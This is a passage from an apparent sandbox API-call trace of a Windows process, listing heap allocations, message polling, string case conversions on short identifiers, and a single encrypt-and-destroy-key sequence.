Size=0x20) returned 0x24b3ad8 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0197.139] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.139] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0197.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.139] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.140] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.140] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0197.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0197.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0197.140] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e69b8*, pdwDataLen=0x8bef68*=0x77a7, dwBufLen=0x77a8 | out: pbData=0x24e69b8*, pdwDataLen=0x8bef68*=0x77a8) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01b0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0197.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0190 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0197.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0197.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0197.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0197.143] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0197.143] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0197.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.143] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0197.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.143] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0197.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0197.143] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0197.143] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.144] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0197.144] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.144] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0197.144] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0197.144] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0197.144] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0197.144] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0197.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0197.145] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0197.145] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.145] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0197.145] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.145] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0197.145] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0197.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.149] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0197.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.151] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0197.152] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0197.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0197.152] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0197.152] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0197.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0197.153] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0197.153] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.153] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0197.154] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0197.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0197.154] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0197.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0197.154] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0197.154] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0197.154] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0197.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0197.155] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0197.155] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0197.155] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0197.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.155] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0197.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.155] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0197.155] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0197.155] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0197.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.156] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0197.156] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0197.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0197.156] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0197.156] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0197.156] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0197.156] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0197.156] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: 